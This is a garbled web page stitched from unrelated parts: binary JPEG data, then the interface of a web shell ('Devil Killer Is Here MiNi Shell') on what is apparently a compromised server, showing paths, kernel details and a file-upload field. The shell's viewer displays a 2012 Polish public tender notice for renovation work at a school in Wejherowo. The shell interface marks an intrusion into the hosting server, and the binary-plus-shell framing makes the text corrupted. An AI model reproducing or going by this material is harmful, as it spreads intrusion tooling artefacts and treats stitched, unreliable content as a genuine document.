JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120514/153884-N-2012.html

<p class="kh_header"><b>Wejherowo: Roboty remontowe w ZSP4 w Wejherowie</b><br>
<b>Numer ogłoszenia: 153884 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 4 im. Jakuba Wejhera , ul. Sobieskiego 344, 84-200 Wejherowo, woj. pomorskie, tel. 058 6722415, faks 058 6722095.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspg4.wejher.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe w ZSP4 w Wejherowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonanie robót remontowych w ZSP4 obejmujących:
- remont sali lekcyjnej nr 105 i 133, 
- remont dwóch  łazienek dla personelu znajdujących się na piętrze szkoły, 
- roboty w zakresie stolarki okiennej w salach komputerowych polegające na założeniu na szyby okienne w  pracowniach komputerowych folii przeciwsłonecznej w miejsce aktualnie istniejących rolet okiennych ( folia o skuteczności pochłaniania światła  min. w 80%, przy jednoczesnym dostatecznym przenikaniu światła dziennego), co ma  zdecydowanie poprawić komfort  nauki z powodu lepszej oglądalności  obrazu na monitorach, a także z powodu  ograniczenia emisji ciepła z zewnątrz do środka  pomieszczeń,
- odtworzenie zaplecza w sali 220 z pracami remontowymi towarzyszącymi,
 - remont instalacji elektrycznej polegający na wymianie łączników w rozdzielnicy głównej  i dostosowaniu  do wymagań p.poż. ( główny przeciwpożarowy wyłącznik prądu)
Poniżej przedstawia się wykaz robót do wykonania dla w/w zadań, zaś szczegółowy zakres prac przedstawia przedmiar robót ( załącznik nr 11 do SIWZ):

1.0	SALA NR 105

1.1 Roboty rozbiórkowe:
- rozebranie posadzek z wykładzin PCV wraz z utylizacją - 76,24 m2
- rozebranie boazerii drewnianej - 37,18 m2
- wykucie z muru ościeżnic drzwiowych - 2 szt

1.2 Remont ścian:
- wykonanie przesklepień z belek L19 - 0,04 m3

1.3 Roboty tynkowe
- uzupełnienie tynków zwykłych wewnętrznych cem.-wap. ścian - 11,16 m2
- cekolowanie sufitów - 76,24 m2
- cekolowanie ścian - 88,02 m2

1.4 Remont podłóg
- posadzki z wykładzin z tworzyw sztucznych z PCW spawanych wraz z przygotowaniem podłoża i warstwą wyrównującą - 83,11 m2
- pokrycie posadzki emulsją polimerową - 83,11 m2
- listwy posadzkowe maskujące z profili aluminiowych - 0,90 m

1.5 Osadzenie stolarki drzwiowej
- Skrzydła drzwiowe płytowe wewnętrzne pełne jednoskrzydłowe fabrycznie wykończone - w okleinie drewnopodobnej CPL HQ - 2 szt
- Ościeżnice regulowane MDF w okleinie drewnopodobnej CPL o szer.30 cm - 1 szt
- Ościeżnice regulowane MDF w okleinie drewnopodobnej CPL o szer.15 cm - 1 szt

1.6 Roboty malarskie:
- zeskrobanie i zmycie starej farby - 190,55 m2
- dwukrotne malowanie farbami emulsyjnymi sufitów w kolorze białym - 76,24 m2
- dwukrotne malowanie farbami emulsyjnymi ścian w kolorach pastelowych - 88,02 m2
- trzykrotne malowanie zwykłe farbą ftalową tynków wewnętrznych z dwukrotnym szpachlowaniem - 56,29 m2
- dwukrotne malowanie farbami ftalowymi rur o średnicy do 50 mm - 24,72 mb

1.7 Roboty instalacyjne wod-kan:
- wymiana umywalki porcelanowej wraz z baterią - 1 kpl.
- wymiana istniejącej instalacji wodociągowej na nową z rur miedzianych 15 mm - 6,00 mb
- wymiana przepływowego podgrzewacza wody - naścienny, podumywalkowy o mocy min. 5kW - 1 szt

1.8 Roboty instalacyjne elektryczne
- demontaż opraw świetlówkowych z rastrem - 7 szt.
- demontaż łączników i gniazd - 18 szt.
- montaż  przewodów podtynkowych typu YDYp 3x1,5 mm2 - 42,00 mb
- montaż  przewodów podtynkowych typu YDYp 3x2,5 mm2 - 37,00 mb
- montaż przewodów VGA (D-SUB15, RGB High Quality) do podłączenia projektora z komputerem - 12,00 mb
- montaż przewodów UTP4x2x0,5 cat5e wraz z korytkami - 48,00 mb
- montaż łącznika instalacji oświetleniowej podtynkowego wraz z puszką - 3 szt.
- montaż do gotowego podłoża gniazd wtyczkowych podtynkowych 2-biegunowych z uziemieniem w puszkach z podłączeniem - 6 szt.
- montaż gniazd VGA natynkowych z podłączeniem - 1 szt.
- montaż opraw oświetleniowych z rozbiórki (Inwestora) - 7 szt.
- montaż oprawy oświetleniowej natynkowej dł. min 1200 mm, 44 W z kierunkowym odbłyśnikiem z elektronicznym układem zasilającym EVG, malowana proszkowo - do oświetlenia tablicy szkolnej - 1 szt.
- podłączenie elektrycznego naściennego, podumywalkowego podgrzewacza wody - 1 szt.
- montaż tablicy rozdzielczej o masie do 10 kg - kompletnej z wyłącznikiem nadprądowym i przeciwporażeniowym oraz z zabezpieczeniami
- wentylatory osiowe ścienne o średnicy 150 mm i wydajności min. 200 m3/h - 2 szt
- montaż ekranu projekcyjnego manualnego o wymiarach min. 1,50 x 1,50 m - 1 szt
- sprawdzenie i pomiar skuteczności zerowania - 3 pomiary

2. 0 SANITARIATY -I PIĘTRO

2.1 Roboty rozbiórkowe:
- rozebranie ścianki z cegieł - 1,06 m2
- rozebranie okładziny ściennej - 15,39 m2
- rozebranie posadzek z płytek ceramicznych - 3,79 m2
- transport i utylizacja gruzu - 0,72 m3

2.2 Remont ścian
- Ścianki działowe GR z płyt gipsowo-kartonowych na rusztach metalowych z pokryciem jednostronnym dwuwarstwowo - 7,27 m2

2.3 Roboty tynkowe
- Okładziny gipsowo-kartonowe, pojedyncze, na stropach, na rusztach metalowych pojedynczych podwieszonych - 3,46 m2
- cekolowanie tynków ścian - 7,23 m2
- Licowanie ścian płytkami z kamieni sztucznych o wymiarach 20x30 cm na zaprawie klejowej - 19,32 m2

2.4 Remont podłóg
- Posadzki z płytek z kamieni sztucznych 30x30 cm wraz z warstwą wyrównawczą - 3,46 m2
- Listwy posadzkowe maskujące z profili aluminiowych - 1,60 m

2.5 Roboty malarskie
- dwukrotne malowanie farbami emulsyjnymi sufitów w kolorze białym - 3,46 m2
- dwukrotne malowanie farbami emulsyjnymi ścian w kolorze białym - 7,23 m2

2.6  Roboty instalacyjne wod-kan:
- wymiana umywalki porcelanowej wraz z baterią stojącą - 2 kpl
- demontaż bojlera - 1 szt
- wymiana istniejącej instalacji wodociągowej na nową z rur miedzianych 15 mm - 8,00 mb
- wymiana instalacji kanalizacyjnej na nową z PCV śr. 50 mm 
- wymiana instalacji kanalizacyjnej na nową z PCV śr. 110 mm - 6,36 mb
- wymiana muszli na nowe podwieszane na stelażu do zabudowy - 2 kpl
- montaż przepływowego podgrzewacza wody - naścienny, podumywalkowy o mocy min. 5kW - 2 szt

2.7 Roboty instalacyjne elektryczne
- wymiana opraw żarowych natynkowych - 2 szt
- wymiana łączników podtynkowych  - 2 szt
- montaż  przewodów podtynkowych typu YDYp 3x2,5 mm2 - 35,00 mb
- sprawdzenia i pomiary instalacji elektrycznej - 2 pomiary


3.0 SALA NR 102 ( prac. komputerowa)
3.1 Remont stolarki okiennej
- demontaż rolet okiennych - 7,02 m2
- Oklejenie szyb okiennych folią przeciwsłoneczną o skuteczności pochłaniania światła min. 80% - 7,02 m2
- Montaż nawietrzaków podciśnieniowych w ramie okiennej - 3 szt.

4.0 SALA NR 210 ( prac. komputerowa)

4.1 Remont stolarki okiennej
- demontaż rolet okiennych - 11,72 m2
- Oklejenie szyb okiennych folią przeciwsłoneczną o skuteczności pochłaniania światła min. 80% - 11,72 m2
- Montaż nawietrzaków podciśnieniowych w ramie okiennej - 5 szt.

5.0 SALA NR 133

5.1 Roboty rozbiórkowe:
- rozebranie posadzek z wykładzin PCV wraz z utylizacją - 51,96 m2

5.2 Roboty tynkowe
- uzupełnienie tynków zwykłych wewnętrznych cem.-wap. ścian - 6,50 m2
- cekolowanie sufitów - 51,96 m2
- cekolowanie ścian - 42,95 m2

5.3 Remont podłóg
- posadzki z wykładzin z tworzyw sztucznych z PCW spawanych wraz z przygotowaniem podłoża i warstwą wyrównującą - 61,22 m2
- pokrycie posadzki emulsją polimerową - 83,11 m2
- Listwy posadzkowe maskujące z profili aluminiowych - 0,90 m

5.4 Roboty malarskie:
- zeskrobanie i zmycie starej farby - 94,91 m2
- dwukrotne malowanie farbami emulsyjnymi sufitów w kolorze białym - 51,96 m2
- dwukrotne malowanie farbami emulsyjnymi ścian w kolorach pastelowych - 42,95 m2
- trzykrotne malowanie zwykłe farbą ftalową tynków wewnętrznych z dwukrotnym szpachlowaniem - 45,95 m2

5.5 Roboty instalacyjne c.o.:
- demontaż grzejników żeliwnych - 3 szt
- Demontaż rurociągu stalowego o połączeniach spawanych o śr. 20 mm - 18,00 m
- Rurociągi c.o. miedziane lutowane o śr.zew. 18 mm (grub.ścianki 1.0 mm) na ścianach (lutowanie miękkie) w otulinie ze spienionego polietylenu z wykuciem bruzd - 26,00 m
- Grzejniki stalowe dwupłytowe  - V22 600/1800 z głowicą termostatyczną wraz z przyłączami i zaworami - 3 kpl
- próba szczelności instalacji c.o.

5.6 Roboty instalacyjne elektryczne
- demontaż opraw świetlówkowych z rastrem - 8 szt
- demontaż łączników i gniazd - 18 szt
- montaż  przewodów podtynkowych typu YDYp 3x2,5 mm2 - 21,00 mb
- montaż przewodów VGA (D-SUB15, RGB High Quality) do podłączenia projektora z komputerem - 12,00 mb
- montaż łącznika instalacji oświetleniowej podtynkowego wraz z puszką - 2 szt
- montaż do gotowego podłoża gniazd wtyczkowych podtynkowych 2-biegunowych z uziemieniem w puszkach z podłączeniem - 1 szt
- montaż gniazd VGA natynkowych z podłączeniem - 1 szt
- montaż opraw oświetleniowych z rozbiórki (Inwestora) - 8 szt
- montaż oprawy oświetleniowej natynkowej dł. min 1200 mm, 44 W z kierunkowym odbłyśnikiem z elektronicznym układem zasilającym EVG, malowana proszkowo - do oświetlenia tablicy szkolnej - 1 szt
- wentylatory osiowe ścienne o średnicy 150 mm i wydajności min. 200 m3/h - 1 szt
- montaż ekranu projekcyjnego manualnego o wymiarach min. 1,50 x 1,50 m - 1 szt
- sprawdzenie i pomiar skuteczności zerowania - 3 pomiary

6.0 SALA NR 220

6.1 Roboty murowe
- Ścianki działowe z płyt gips.-kart. na rusztach metalowych pojedynczych z pokryciem obustronnym jednowarstwowo - 10,37 m2

6.2 Osadzenie stolarki drzwiowej
- Skrzydła drzwiowe płytowe wewnętrzne pełne jednoskrzydłowe fabrycznie wykończone - w okleinie drewnopodobnej CPL HQ - przesuwne - kompletne zamykane na wkładkę patentową - 1 kpl.

6.3 Remont podłóg
- Posadzki z tworzyw sztucznych - listwy przyścienne z PCV - 6,00 m

6.4 Roboty malarskie:
- dwukrotne malowanie farbami emulsyjnymi sufitów w kolorze białym - 17,31 m2
- dwukrotne malowanie farbami emulsyjnymi ścian w kolorach pastelowych - 13,63 m2
- trzykrotne malowanie zwykłe farbą ftalową tynków wewnętrznych z dwukrotnym szpachlowaniem - 15,04 m2

6.5 Roboty instalacyjne wod-kan:
- przebicie otworów w ścianach - 2 szt
- montaż umywalki porcelanowej wraz z baterią - 1 kpl
- wymiana istniejącej instalacji wodociągowej na nową z rur miedzianych 15 mm - 6,00 mb
- Rurociągi z PVC kanalizacyjne o śr. 50 mm na ścianach w budynkach niemieszkalnych o połączeniach wciskowych - 4,00 m
- wymiana przepływowego podgrzewacza wody - naścienny, podumywalkowy o mocy min. 5kW - 1 szt

6.6 Roboty instalacyjne elektryczne
- demontaż opraw świetlówkowych z rastrem - 1 szt
- demontaż łączników i gniazd - 2 szt
- demontaż gniazd wtyczkowych - 1 szt
- montaż  przewodów podtynkowych typu YDYp 3x1,5 mm2 - 8,50 mb
- montaż  przewodów podtynkowych typu YDYp 3x2,5 mm2 - 7,00 mb
- montaż łącznika instalacji oświetleniowej podtynkowego wraz z puszką - 2 szt
- montaż do gotowego podłoża gniazd wtyczkowych podtynkowych 2-biegunowych z uziemieniem w puszkach z podłączeniem - 1 szt
- montaż gniazd VGA natynkowych z podłączeniem - 1 szt
- montaż opraw oświetleniowych z rozbiórki (Inwestora) - 1 szt
- sprawdzenie i pomiar skuteczności zerowania - 2 pomiary

7. 0  REMONT INST. ELEKTR.- GŁÓWNY WYŁĄCZNIK PRZECIWPOŻAROWY

7.1 Roboty instalacyjne elektryczne
- Wykucie wnęk o głębokości do 1/2 ceg. w ścianach z cegieł na zaprawie cementowo-wapiennej - 0,14 m2
- Montaż skrzynek i rozdzielnic skrzynkowych o masie do 10 kg wraz z konstrukcją - mocowanie przez zabetonowanie w gotowych otworach - skrzynka stalowa o wym. min. 26x45 cm z zamkiem i szyną - 1 szt
- Przewody izolowane jednożyłowe o przekroju żyły do 2.5 mm2 układane w gotowych korytkach - przewód HDGS (żo) 2x1,5 mm2 w kanałach instalacyjnych z PCV - 205,00 mb
- Montaż na gotowym podłożu - przycisk ROP-A z podłączeniem - przycisk z demontażu (Inwestora) - 1 szt.
- Montaż rozłącznika FRX303-125A z podłączeniem - 2 szt
- Montaż wyzwalacza wzrostowego WW 361 z podłączeniem - 2 szt
- Montaż wyłącznika RBK 160A z podłączeniem - 1 szt
- Montaż puszki rozgałęźnej WKE 2-5x6 mm2 -  1 szt 
- sprawdzenie i pomiar skuteczności zerowania - 2 pomiary.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje  udzielenie zamówienia uzupełniającego, w okresie 3 lat  od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy, stanowiących nie więcej niż 50% wartości  zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień ( art.67 ust.1 pkt 6).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.43.12.00-9, 45.43.00.00-0, 45.42.10.00-4, 45.33.20.00-3, 45.33.11.00-7, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunku z art.22 ust 1 pkt 2 Wykonawca winien przedstawić wykaz   wykonanych w okresie ostatnich 5 lat co najmniej 3 robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   
             odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot 
              zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, na kwotę nie 
              mniejszą niż 200 tyś. złotych każda (sł. dwieście tysięcy złotych). 
             Wykaz należy wykonać wg załącznika nr 7 do SIWZ. Do wykazu należy załączyć
             dokumenty  potwierdzające, że roboty  zostały  prawidłowo ukończone i wykonane 
             zgodnie  z zasadami sztuki budowlanej (przedstawić referencje)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunku z art. 22 ust.1 pkt 3 Wykonawca jest zobowiązany przedstawić  wykaz stanu osobowego kadry inżynieryjno-technicznej, która będzie wykonywać zamówienie lub będzie uczestniczyć w wykonaniu zamówienia wraz z dołączeniem uprawnień budowlanych -załącznik nr 8 do SIWZ. Do wykazu  należy załączyć również aktualne zaświadczenia, że osoby te są członkami Izby Inżynierów Budownictwa i posiadają wymagane ubezpieczenie od odpowiedzialności cywilnej -  wymagana  jest minimum jedna osoba z uprawnieniami do kierowania robotami budowlanymi bez ograniczeń  (pełnienia funkcji kierownika budowy) oraz   osoby do pełnienia  funkcji kierownika robót elektrycznych i kierownika robót sanitarnych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
